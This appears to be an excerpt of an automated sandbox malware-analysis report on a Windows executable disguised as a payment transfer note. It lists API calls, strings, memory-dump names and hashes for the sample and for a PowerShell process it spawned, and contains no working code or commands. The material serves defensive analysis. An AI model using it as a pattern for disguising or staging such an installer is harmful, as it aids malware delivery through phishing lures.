MulDiv.KERNEL32(00000000,00000002,00000000), ref: 00401D60
ReleaseDC.USER32(?,00000000), ref: 00401D71
CreateFontIndirectW.GDI32(0040BD88), ref: 00401DBC

Memory Dump Source

Source File: 00000000.00000002.1267303834.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1267289005.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267320686.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267336668.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267336668.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267336668.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267336668.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267336668.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267336668.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267336668.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267336668.0000000000444000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267550574.0000000000448000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Confirmation transfer Note AGS # 22-00379.jbxd

Similarity

API ID: CapsCreateDeviceFontIndirectRelease
String ID:
API String ID: 3808545654-0
Opcode ID: bdf0aea4df8e2e68d88040a8141e897e7d917dcd0e150930727cc730d68c84d5
Instruction ID: 44c615356a1505882b51123a4f434c8e94683597a24d5f064f7d9f3cb87cb74c
Opcode Fuzzy Hash: bdf0aea4df8e2e68d88040a8141e897e7d917dcd0e150930727cc730d68c84d5
Instruction Fuzzy Hash: 25012630948280AFE7006BB0AE4BB9A7F74EF95305F104479F145B62E2C37810009B6E

Function 00404976 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 78stringCOMMON

Download Yara Rule

APIs

lstrlenW.KERNEL32(004226D0,004226D0,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,?,000000DF,0000040F,00000400,00000000), ref: 00404A07
wsprintfW.USER32 ref: 00404A10
SetDlgItemTextW.USER32(?,004226D0), ref: 00404A23

Strings

%u.%u%s%s, xrefs: 004049F1

Memory Dump Source

Source File: 00000000.00000002.1267303834.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1267289005.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267320686.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267336668.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267336668.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267336668.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267336668.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267336668.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267336668.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267336668.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267336668.0000000000444000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267550574.0000000000448000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Confirmation transfer Note AGS # 22-00379.jbxd

Similarity

API ID: ItemTextlstrlenwsprintf
String ID: %u.%u%s%s
API String ID: 3540041739-3551169577
Opcode ID: 4296bb9edf2789e867a9d2459d6d531fcd7c7c1783075924c57ec8259cd97d31
Instruction ID: 11a56ec29d8e774b63c5a31ca8dd146b3e369a93441477fc7d09fda37b012288
Opcode Fuzzy Hash: 4296bb9edf2789e867a9d2459d6d531fcd7c7c1783075924c57ec8259cd97d31
Instruction Fuzzy Hash: 7011E273A002243BCB10A66D9C45EAF368D9BC6374F14423BFA69F61D1D9799C2186EC

Function 00401BCA Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 76windowtimeCOMMON

Download Yara Rule

APIs

SendMessageTimeoutW.USER32(00000000,00000000,?,?,?,00000002,?), ref: 00401C2A
SendMessageW.USER32(00000000,00000000,?,?), ref: 00401C42

Strings

!, xrefs: 00401BFE

Memory Dump Source

Source File: 00000000.00000002.1267303834.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1267289005.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267320686.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267336668.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267336668.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267336668.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267336668.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267336668.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267336668.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267336668.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267336668.0000000000444000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267550574.0000000000448000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Confirmation transfer Note AGS # 22-00379.jbxd

Similarity

API ID: MessageSend$Timeout
String ID: !
API String ID: 1777923405-2657877971
Opcode ID: 9d438e6b5940c4dfeb703fc487ee7d8779a96f3a357671301b43fd1e281e0956
Instruction ID: 4e2ee5f0d92934ddef816e72561913b102c535ce611946f90f9b6b3ff638ae8b
Opcode Fuzzy Hash: 9d438e6b5940c4dfeb703fc487ee7d8779a96f3a357671301b43fd1e281e0956
Instruction Fuzzy Hash: 2221A171A44208AEEF01AFB0C98AEAD7B75EF45308F10413AF602B61D1D6B8A941DB19

Function 00405DB5 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 45registryCOMMON

Download Yara Rule

APIs

RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?,00000002,: Completed,?,00406028,80000002,Software\Microsoft\Windows\CurrentVersion,?,: Completed,?), ref: 00405DDF
RegQueryValueExW.ADVAPI32(?,?,00000000,?,?,?,?,00406028,80000002,Software\Microsoft\Windows\CurrentVersion,?,: Completed,?), ref: 00405E00
RegCloseKey.ADVAPI32(?,?,00406028,80000002,Software\Microsoft\Windows\CurrentVersion,?,: Completed,?), ref: 00405E23

Strings

: Completed, xrefs: 00405DB8

Memory Dump Source

Source File: 00000000.00000002.1267303834.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1267289005.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267320686.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267336668.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267336668.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267336668.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267336668.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267336668.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267336668.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267336668.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267336668.0000000000444000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267550574.0000000000448000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Confirmation transfer Note AGS # 22-00379.jbxd

Similarity

API ID: CloseOpenQueryValue
String ID: : Completed
API String ID: 3677997916-2954849223
Opcode ID: 6d49e1ec12a7b24cc87819d5cf70687d25a5c21dfc25d1df192b84af38ef9460
Instruction ID: afa83f24152e7e9ce060601fd796842ff4531c7984e311905aa048a3366a239a
Opcode Fuzzy Hash: 6d49e1ec12a7b24cc87819d5cf70687d25a5c21dfc25d1df192b84af38ef9460
Instruction Fuzzy Hash: DC011A3115020AEADB218F56ED09EEB3BA8EF85354F00403AF945D6260D335DA64DBF9

Function 00405933 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 16stringCOMMON

Download Yara Rule

APIs

lstrlenW.KERNEL32(?,C:\Users\user~1\AppData\Local\Temp\,00403342,C:\Users\user~1\AppData\Local\Temp\,C:\Users\user~1\AppData\Local\Temp\,C:\Users\user~1\AppData\Local\Temp\,771B3420,00403510), ref: 00405939
CharPrevW.USER32(?,00000000,?,C:\Users\user~1\AppData\Local\Temp\,00403342,C:\Users\user~1\AppData\Local\Temp\,C:\Users\user~1\AppData\Local\Temp\,C:\Users\user~1\AppData\Local\Temp\,771B3420,00403510), ref: 00405943
lstrcatW.KERNEL32(?,00409014), ref: 00405955

Strings

C:\Users\user~1\AppData\Local\Temp\, xrefs: 00405933

Memory Dump Source

Source File: 00000000.00000002.1267303834.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1267289005.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267320686.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267336668.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267336668.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267336668.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267336668.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267336668.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267336668.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267336668.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267336668.0000000000444000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267550574.0000000000448000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Confirmation transfer Note AGS # 22-00379.jbxd

Similarity

API ID: CharPrevlstrcatlstrlen
String ID: C:\Users\user~1\AppData\Local\Temp\
API String ID: 2659869361-2382934351
Opcode ID: ff6b15c2f5550a5b1ad39c2dabef59c5d9ab40b11c2ea079a8f7966cac1aab2f
Instruction ID: 44c8f02d27920c7d59b6ae10536407caccd7e36c496fb0f87730dad2d93a7b21
Opcode Fuzzy Hash: ff6b15c2f5550a5b1ad39c2dabef59c5d9ab40b11c2ea079a8f7966cac1aab2f
Instruction Fuzzy Hash: FFD05261101920AAC222AB488C04D9B67ACEE86301340002AF201B20A2CB7C2E428BFE

Function 00401F08 Relevance: 6.1, APIs: 4, Instructions: 55memoryCOMMON

Download Yara Rule

APIs

GetFileVersionInfoSizeW.VERSION(00000000,?,000000EE), ref: 00401F17
GlobalAlloc.KERNEL32(00000040,00000000,00000000,?,000000EE), ref: 00401F39
GetFileVersionInfoW.VERSION(?,?,00000000,00000000), ref: 00401F50
VerQueryValueW.VERSION(?,00409014,?,?,?,?,00000000,00000000), ref: 00401F69

Part of subcall function 00405E2F: wsprintfW.USER32 ref: 00405E3C

Memory Dump Source

Source File: 00000000.00000002.1267303834.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1267289005.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267320686.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267336668.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267336668.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267336668.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267336668.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267336668.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267336668.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267336668.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267336668.0000000000444000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267550574.0000000000448000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Confirmation transfer Note AGS # 22-00379.jbxd

Similarity

API ID: FileInfoVersion$AllocGlobalQuerySizeValuewsprintf
String ID:
API String ID: 1404258612-0
Opcode ID: ca7f9e254c0363c1f49dfe126ad383ac947da7ba503cf0d7429683875ede6684
Instruction ID: 69d4cfede9788cc5a39dfd4732502e81c1ba8e36930914c0ac138746a00c9a3b
Opcode Fuzzy Hash: ca7f9e254c0363c1f49dfe126ad383ac947da7ba503cf0d7429683875ede6684
Instruction Fuzzy Hash: 27114875A00108BEDB00EFA5D945DAEBBBAEF04344F21407AF501F62E1E7349E50CB68

Function 00405106 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 46windowCOMMON

Download Yara Rule

APIs

IsWindowVisible.USER32(?), ref: 00405135
CallWindowProcW.USER32(?,?,?,?), ref: 00405186

Part of subcall function 00404179: SendMessageW.USER32(?,00000000,00000000,00000000), ref: 0040418B

Strings

, xrefs: 00405116

Memory Dump Source

Source File: 00000000.00000002.1267303834.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1267289005.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267320686.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267336668.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267336668.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267336668.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267336668.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267336668.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267336668.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267336668.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267336668.0000000000444000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267550574.0000000000448000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Confirmation transfer Note AGS # 22-00379.jbxd

Similarity

API ID: Window$CallMessageProcSendVisible
String ID:
API String ID: 3748168415-3916222277
Opcode ID: ffbbbef4bb215af9c79ac16ecb942473111b8a896db240ad95dfeee9b4123394
Instruction ID: a693931b294d40b9fc88652aed0c21abafbc2ac9e0ef9b0e0ec3bcc5ba2f922e
Opcode Fuzzy Hash: ffbbbef4bb215af9c79ac16ecb942473111b8a896db240ad95dfeee9b4123394
Instruction Fuzzy Hash: B2019E71A00609FFDB215F51DD84F6B3726EB84350F508136FA007A2E1C37A8C929F6A

Function 0040381D Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 19COMMON

Download Yara Rule

APIs

FreeLibrary.KERNEL32(?,C:\Users\user~1\AppData\Local\Temp\,00000000,771B2EE0,004037F4,771B3420,0040361F,?), ref: 00403837
GlobalFree.KERNEL32(?), ref: 0040383E

Strings

C:\Users\user~1\AppData\Local\Temp\, xrefs: 0040382F

Memory Dump Source

Source File: 00000000.00000002.1267303834.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1267289005.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267320686.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267336668.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267336668.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267336668.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267336668.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267336668.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267336668.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267336668.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267336668.0000000000444000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267550574.0000000000448000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Confirmation transfer Note AGS # 22-00379.jbxd

Similarity

API ID: Free$GlobalLibrary
String ID: C:\Users\user~1\AppData\Local\Temp\
API String ID: 1100898210-2382934351
Opcode ID: 25d95e5d869358f2c737a5aedab69329feae714e5110f3e95756ca8a51977f9e
Instruction ID: 46cd0999c48b818ae3c50a5e697a2c548effd71f48cd6e5996984714d7197a8e
Opcode Fuzzy Hash: 25d95e5d869358f2c737a5aedab69329feae714e5110f3e95756ca8a51977f9e
Instruction Fuzzy Hash: 01E0C23390503057C7316F14ED05B1ABBE86F89B22F014076F9417B7A183746C528BED

Function 0040597F Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 16stringCOMMON

Download Yara Rule

APIs

lstrlenW.KERNEL32(80000000,C:\Users\user\Desktop,00402E26,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\Confirmation transfer Note AGS # 22-00379.exe,C:\Users\user\Desktop\Confirmation transfer Note AGS # 22-00379.exe,80000000,00000003), ref: 00405985
CharPrevW.USER32(80000000,00000000,80000000,C:\Users\user\Desktop,00402E26,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\Confirmation transfer Note AGS # 22-00379.exe,C:\Users\user\Desktop\Confirmation transfer Note AGS # 22-00379.exe,80000000,00000003), ref: 00405995

Strings

C:\Users\user\Desktop, xrefs: 0040597F

Memory Dump Source

Source File: 00000000.00000002.1267303834.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1267289005.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267320686.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267336668.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267336668.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267336668.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267336668.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267336668.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267336668.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267336668.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267336668.0000000000444000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267550574.0000000000448000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Confirmation transfer Note AGS # 22-00379.jbxd

Similarity

API ID: CharPrevlstrlen
String ID: C:\Users\user\Desktop
API String ID: 2709904686-3976562730
Opcode ID: 5322967536e1a0efddda02766e650d0d94df305eef9f06c9ed47c97fde570a53
Instruction ID: 052b7d625f743090f45407db0d4342bedadcdb208645d65a5e8033f28458e035
Opcode Fuzzy Hash: 5322967536e1a0efddda02766e650d0d94df305eef9f06c9ed47c97fde570a53
Instruction Fuzzy Hash: 4DD05EB2400A20DAD3226B08DC009AFB3ACEF113107464466F841A21A5D7786D818BE9

Function 00405AB9 Relevance: 5.0, APIs: 4, Instructions: 37stringCOMMON

Download Yara Rule

APIs

lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00405CF3,00000000,[Rename],00000000,00000000,00000000), ref: 00405AC9
lstrcmpiA.KERNEL32(00405CF3,00000000), ref: 00405AE1
CharNextA.USER32(00405CF3,?,00000000,00405CF3,00000000,[Rename],00000000,00000000,00000000), ref: 00405AF2
lstrlenA.KERNEL32(00405CF3,?,00000000,00405CF3,00000000,[Rename],00000000,00000000,00000000), ref: 00405AFB

Memory Dump Source

Source File: 00000000.00000002.1267303834.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1267289005.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267320686.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267336668.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267336668.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267336668.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267336668.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267336668.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267336668.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267336668.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267336668.0000000000444000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267550574.0000000000448000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Confirmation transfer Note AGS # 22-00379.jbxd

Similarity

API ID: lstrlen$CharNextlstrcmpi
String ID:
API String ID: 190613189-0
Opcode ID: f0f41473c1062d639537f97a351ef6b232bfd88747b8e1d85754dbc4161d6f9d
Instruction ID: 0e21c6ccf38cfde73736f548742f9065f02c2b70c8696d75456ee166b8786c13
Opcode Fuzzy Hash: f0f41473c1062d639537f97a351ef6b232bfd88747b8e1d85754dbc4161d6f9d
Instruction Fuzzy Hash: 59F0C231604458AFCB12DBA4CD4099FBBA8EF06250B2140A6F801F7210D274FE019BA9

Analysis Process: powershell.exePID: 424, Parent PID: 5340COMMON

Executed Functions

Function 048CEAD8 Relevance: .3, Instructions: 281COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.1623792645.00000000048C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 048C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_48c0000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 28940db9ba5d448dd3079c283dbb4f471298faf85600ea2d972ac8ece8953ee2
Instruction ID: 24716264741712794f2385998d895f6596973670909fd3cca5b553717bca41af
Opcode Fuzzy Hash: 28940db9ba5d448dd3079c283dbb4f471298faf85600ea2d972ac8ece8953ee2
Instruction Fuzzy Hash: B2B16171E00219DFDB24CFA9C8857ADBBF2AF48314F148A2DD815E7294EB74E845CB81

Function 048CF3A8 Relevance: .3, Instructions: 266COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.1623792645.00000000048C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 048C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_48c0000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 60fab0a62f7298dd3bbcbab130e2bb4e6a56c1ca3d67703fcd648a41bf0a0328
Instruction ID: a203d9138a0ee4f2153179cdfbe5b1270e17dc61aa3f48745f63690a884464a9
Opcode Fuzzy Hash: 60fab0a62f7298dd3bbcbab130e2bb4e6a56c1ca3d67703fcd648a41bf0a0328
Instruction Fuzzy Hash: 6EB15171E00219CFEB14CFA9D881B9DBBF2AF48314F148A2DD615E7294EB74E845CB85

Function 07782E10 Relevance: 36.4, Strings: 28, Instructions: 1396COMMON

Download Yara Rule

Strings

4'q, xrefs: 077835F5
4'q, xrefs: 07782F69
4'q, xrefs: 077839C7
4'q, xrefs: 077832AA
4'q, xrefs: 0778335E
4'q, xrefs: 077834AE
4'q, xrefs: 077839BB
4'q, xrefs: 07783A6F
4'q, xrefs: 0778354A
4'q, xrefs: 077832B6
4'q, xrefs: 07783352
4'q, xrefs: 07783868
4'q, xrefs: 0778391F
4'q, xrefs: 07783913
4'q, xrefs: 07782F75
4'q, xrefs: 0778369D
4'q, xrefs: 077836A9
4'q, xrefs: 077834A2
4'q, xrefs: 07783601
4'q, xrefs: 077833FA
4'q, xrefs: 07783B17
tPq, xrefs: 077830F4
4'q, xrefs: 07783874
4'q, xrefs: 07783406
4'q, xrefs: 07783B0B
tPq, xrefs: 07783100
4'q, xrefs: 07783A63
4'q, xrefs: 07783556

Memory Dump Source

Source File: 00000002.00000002.1631282064.0000000007780000.00000040.00000800.00020000.00000000.sdmp, Offset: 07780000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7780000_powershell.jbxd

Similarity

API ID:
String ID: 4'q$4'q$4'q$4'q$4'q$4'q$4'q$4'q$4'q$4'q$4'q$4'q$4'q$4'q$4'q$4'q$4'q$4'q$4'q$4'q$4'q$4'q$4'q$4'q$4'q$4'q$tPq$tPq
API String ID: 0-279528516
Opcode ID: 6c0e54a083b67bb521ec1ebe56eb8b63933fbebebe3af1e5911da1037378b91b
Instruction ID: 0d2ac5a15d06d5698a221a29b9496aca7fcf02bd9f867153c820403ce71a2281
Opcode Fuzzy Hash: 6c0e54a083b67bb521ec1ebe56eb8b63933fbebebe3af1e5911da1037378b91b
Instruction Fuzzy Hash: ACC2B374B40205CFE724DFA8C455BAEBBA2BB85704F608569D9056F382CB76EC42CF91

Function 077831A8 Relevance: 15.9, Strings: 12, Instructions: 894COMMON

Download Yara Rule

Strings

4'q, xrefs: 07783868
4'q, xrefs: 07783913
4'q, xrefs: 0778369D
4'q, xrefs: 077835F5
4'q, xrefs: 077839BB
4'q, xrefs: 077832AA
4'q, xrefs: 0778354A
4'q, xrefs: 07783B0B
4'q, xrefs: 077834A2
4'q, xrefs: 077833FA
4'q, xrefs: 07783A63
4'q, xrefs: 07783352

Memory Dump Source

Source File: 00000002.00000002.1631282064.0000000007780000.00000040.00000800.00020000.00000000.sdmp, Offset: 07780000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7780000_powershell.jbxd

Similarity

API ID:
String ID: 4'q$4'q$4'q$4'q$4'q$4'q$4'q$4'q$4'q$4'q$4'q$4'q
API String ID: 0-663938088
Opcode ID: 6ae74eba9c58ae92e3c8dd903f8d94e27f3d55a954176ebdf463717c8b8ea20a
Instruction ID: d234540c75e1b721f2db7acd869fb8fe89e5fb977db601d1b142bf893b033c0b
Opcode Fuzzy Hash: 6ae74eba9c58ae92e3c8dd903f8d94e27f3d55a954176ebdf463717c8b8ea20a
Instruction Fuzzy Hash: C4827F78A50201CFEB24DFA8C555BAEBBB2BB45704F608569D9056F382CB76EC42CF41

Function 0778BADA Relevance: 7.9, Strings: 6, Instructions: 406COMMON

Download Yara Rule

Strings

4'q, xrefs: 0778BE94
4'q, xrefs: 0778BEA0
4'q, xrefs: 0778BF28
-k, xrefs: 0778C13B
4'q, xrefs: 0778BF3E
x.k, xrefs: 0778C104

Memory Dump Source

Source File: 00000002.00000002.1631282064.0000000007780000.00000040.00000800.00020000.00000000.sdmp, Offset: 07780000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7780000_powershell.jbxd

Similarity

API ID:
String ID: 4'q$4'q$4'q$4'q$x.k$-k
API String ID: 0-3499190445
Opcode ID: 29bc5fc28bb43fee07ea84f28c4b57c5897940a079f13a150f2cc4f0173cc28a
Instruction ID: 5a0f34607300229bb87ee5ef27661dba896154c9264567b9bed3f950b2d8a961
Opcode Fuzzy Hash: 29bc5fc28bb43fee07ea84f28c4b57c5897940a079f13a150f2cc4f0173cc28a
Instruction Fuzzy Hash: 8C026BB4A002198FEB65DB14C954B9ABBB2BF89305F10C4D9D9096F385CB72ED81CF91

